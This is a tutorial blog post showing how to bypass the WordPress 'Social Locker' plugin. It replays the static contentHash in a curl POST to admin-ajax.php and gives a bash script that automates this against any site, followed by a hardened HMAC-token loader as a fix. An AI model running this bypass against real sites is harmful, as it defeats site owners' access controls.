JavaScript attacks: bypassing Social Locker for WordPress as an example

The article "Attacks on JavaScript" shows examples of bypassing restrictions imposed by JavaScript. The example there is clearly a tutorial one, so it is rather pointless. Let's take a more realistic situation. In the article "Bypass HTML source blocking, bypass social blockers and other countermeasures to collect information about the site" I showed how easy it is to bypass social blockers: the hidden links and text are loaded with the page, and styles are merely used to make the block invisible. I even made a small service that will show you everything that social blockers hide. It's so easy you don't even have to fight JavaScript.

But I was sent an example site (https://www.yasir252.com/software/download-adobe-photoshop-cc-2020-full-version-windows/) that uses a more cunning social blocker.

Looking ahead, this is a paid plugin called "Social Locker for WordPress", and it costs $27.

Moreover, this is not an abandoned plugin: at the time of writing, the last update was made on May 8, 2020.

Let's start by parsing HTML and JavaScript code.

In the source code the name is BizPanda Lockers and the path to this file is /sociallocker-next-premium/bizpanda. I googled it and found the page of this very Social Locker for WordPress.

Analysis of the source code of the page showed that the content of the hidden block is missing in it, although there is some interesting data:
Code:
if (!window.bizpanda) window.bizpanda = {};
if (!window.bizpanda.lockerOptions) window.bizpanda.lockerOptions = {};
window.bizpanda.lockerOptions['onpLock951887'] = {
  "lockerId": "3169",
  "tracking": "0",
  "postId": 17162,
  "ajaxUrl": "https:\/\/…\/wp-admin\/admin-ajax.php",
  "options": {
    "demo": 1,
    "actualUrls": 0,
    "text": {"header": "Link Download Tanpa Iklan", "message": "Klik salah satu tombol dibawah ini untuk download tanpa iklan.<\/p>"},
    "theme": "great-attractor",
    "lang": "en_US",
    "agreement": {"note": 0, "termsUrl": false, "privacyPolicyUrl": false, "showInPopup": {"width": 570, "height": 400}},
    "overlap": {"mode": "full", "position": "middle", "altMode": "full"},
    "highlight": 0,
    "googleAnalytics": 0,
    "locker": {"counter": 1, "loadingTimeout": "20000", "tumbler": 0, "naMode": "show-error", "inAppBrowsers": "visible_with_warning", "inAppBrowsersWarning": "You are viewing this page in the {browser}. The locker may work incorrectly in this browser. Please open this page in a standard browser.", "close": 0, "mobile": 1, "expires": 0},
    "proxy": "https:\/\/…\/wp-admin\/admin-ajax.php?action=opanda_connect",
    "groups": ["social-buttons"],
    "socialButtons": {
      "counters": 1,
      "order": ["facebook-share", "twitter-tweet"],
      "behaviorOnError": "show_error",
      "behaviorError": "Matikan Adblock Untuk Download Tanpa Iklan",
      "facebook": {
        "appId": "331196770812733", "lang": "en_US", "version": "v6.0",
        "like": {"url": "https:\/\/…\/yasir252", "title": "Like", "theConfirmIssue": 0},
        "share": {"url": "https:\/\/…\/software\/download-adobe-photoshop-cc-2020-full-version-windows\/", "title": "Share", "shareDialog": true}
      },
      "twitter": {
        "lang": "en",
        "tweet": {"url": "https:\/\/…\/software\/download-adobe-photoshop-cc-2020-full-version-windows\/", "doubleCheck": 1, "title": "Tweet"},
        "follow": {"url": "https:\/\/twitter.com\/yasir252com", "title": "Follow us", "doubleCheck": 1, "hideScreenName": 1}
      },
      "google": {
        "lang": "en",
        "plus": {"url": "https:\/\/www.yasir252.com\/software\/download-adobe-photoshop-cc-2020-full-version-windows\/", "title": "+1 us"},
        "share": {"url": "https:\/\/…\/software\/download-adobe-photoshop-cc-2020-full-version-windows\/", "title": "Share"}
      },
      "youtube": {"subscribe": {"channelId": "UCvPfXFZzw3x4I1FBYVlXbsg", "title": "Youtube"}},
      "linkedin": {"share": {"url": "https:\/\/…\/software\/download-adobe-photoshop-cc-2020-full-version-windows\/", "title": "share"}}
    },
    "lazy": true
  },
  "_theme": "great-attractor",
  "_style": null,
  "ajax": true,
  "contentHash": "e408051e78dd01cade57a25100ad70c7",
  "stats": false
};
Analysis of the JavaScript file (https://www.yasir252.com/wp-content/plugins/sociallocker-next-premium/bizpanda/assets/js/lockers.020405.min.js) gave this interesting snippet:
Code:
// loading the locked content via ajax

if (data.ajax) {

    options.content = {
        url: data.ajaxUrl,
        type: 'POST',
        data: {
            lockerId: data.lockerId,
            action: 'opanda_loader',
            hash: data.contentHash
        }
    };
}
Pay attention to the comment: "loading the locked content via ajax".

The ajaxUrl, lockerId and contentHash values can be found in the previous code snippet.

In fact, I found the second snippet after figuring out how to bypass this social blocker. You could skip the analysis of the source code altogether and immediately start by analyzing the POST request (see "How to Analyze POST Requests in a Web Browser").

I "liked" the article to view the hidden text.

As you can see, a POST request is sent to the ajaxUrl page, containing the string "lockerId=3169&action=opanda_loader&hash=e408051e78dd01cade57a25100ad70c7".

And in response comes the code hidden by the social blocker.

Rendering the received data:
[Screenshot of the rendered response]

Trying to get the hidden text while bypassing sharing on social networks (<ajaxUrl> stands for the ajaxUrl value from the page source):
Code:
curl '<ajaxUrl>' -d 'lockerId=3169&action=opanda_loader&hash=e408051e78dd01cade57a25100ad70c7'
Everything worked!

If the raw HTML is hard to read, save it to a file and open it in a web browser:
Code:
curl '<ajaxUrl>' -d 'lockerId=3169&action=opanda_loader&hash=e408051e78dd01cade57a25100ad70c7' > locker.htm && firefox locker.htm

Further analysis showed that the hash is static and is always contained in the source code. The lockerId value does not change and any number can be substituted there (perhaps this is the result of a "crack").

In order not to dig through the source code every time, we will create a script for automation. Create the sociallocker-next-premium.sh file:
Code:
gedit sociallocker-next-premium.sh
Copy the following:
Code:
#!/bin/bash

# The page URL is required as the first argument
if [[ -z $1 ]]; then
    echo 'No link provided to bypass social blocker!';
    exit 1;
fi

# Fetch the page source with a browser-like User-Agent
t0=`curl -s -A 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36' "$1"`

# Extract the contentHash value from the lockerOptions line
hash="`echo "$t0" | grep -E 'window.bizpanda.lockerOptions' | grep -E -o '"contentHash":"[A-Za-z0-9]{8,}"' | sed 's/"contentHash":"//' | sed 's/"//'`";
t5=$hash

# Build the admin-ajax.php URL from the scheme and host of the given link
url="`echo "$1" | grep -E -o 'http(|s)://[^/]+'`/wp-admin/admin-ajax.php"

# Request the locked content only if a hash was found
if [[ "$t5" ]]; then
    curl "$url" -d 'lockerId=3169&action=opanda_loader&hash='"$hash"
fi
Run like this:
Code:
bash sociallocker-next-premium.sh 'URL'
For example:
Code:
bash sociallocker-next-premium.sh '…'
To immediately see the content after rendering the HTML code, use the construction:
Code:
bash sociallocker-next-premium.sh 'URL' > locker.htm && firefox locker.htm
For example:
Code:
bash sociallocker-next-premium.sh '…' > locker.htm && firefox locker.htm


I added support for this plugin to my service for bypassing social blockers.
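
The weakness described above is that the contentHash printed in the page source is the only thing the opanda_loader request needs, and lockerId is not checked. The following added example (not code from the article or from the plugin) models that behaviour in Node.js next to a hardened loader that releases content only for a short-lived HMAC token bound to the visitor's session. The function names, the session identifier and the recordUnlock hook are assumptions, and the scheme presumes the server has its own way to confirm that the unlock action happened.

```javascript
const crypto = require('crypto');

// Constructed sample data: a server key and one locked block, keyed by the
// contentHash value quoted in the article. Not taken from the plugin.
const SECRET = crypto.randomBytes(32);
const LOCKED = new Map([
  ['e408051e78dd01cade57a25100ad70c7', '<p>hidden download link</p>'],
]);
const unlocked = new Set(); // "session:hash" pairs the server itself verified

// Model of the behaviour the article observed: the static hash from the page
// source is the only credential, and lockerId is never checked.
function vulnerableLoader(req) {
  return LOCKED.get(req.hash) ?? null;
}

// Hypothetical hook, called only after the server has confirmed the unlock.
function recordUnlock(sessionId, hash) {
  unlocked.add(`${sessionId}:${hash}`);
}

// HMAC over session, content hash and expiry, keyed with the server secret.
function sign(sessionId, hash, exp) {
  return crypto.createHmac('sha256', SECRET)
    .update(`${sessionId}|${hash}|${exp}`).digest();
}

// Issue a short-lived token bound to this session and this content block.
function issueToken(sessionId, hash, now = Date.now(), ttlMs = 300000) {
  if (!unlocked.has(`${sessionId}:${hash}`)) return null;
  const exp = now + ttlMs;
  return `${exp}.${sign(sessionId, hash, exp).toString('hex')}`;
}

// Hardened loader: content is released only for a valid, unexpired token.
function hardenedLoader(req, now = Date.now()) {
  const [expStr, mac] = String(req.token ?? '').split('.');
  const exp = Number(expStr);
  if (!mac || !Number.isFinite(exp) || exp < now) return null;
  const given = Buffer.from(mac, 'hex');
  const expected = sign(req.sessionId, req.hash, exp);
  if (given.length !== expected.length) return null;
  if (!crypto.timingSafeEqual(given, expected)) return null;
  return LOCKED.get(req.hash) ?? null;
}
```

With this design the value embedded in the page is only an identifier; replaying it without a token, from another session, or after expiry returns nothing.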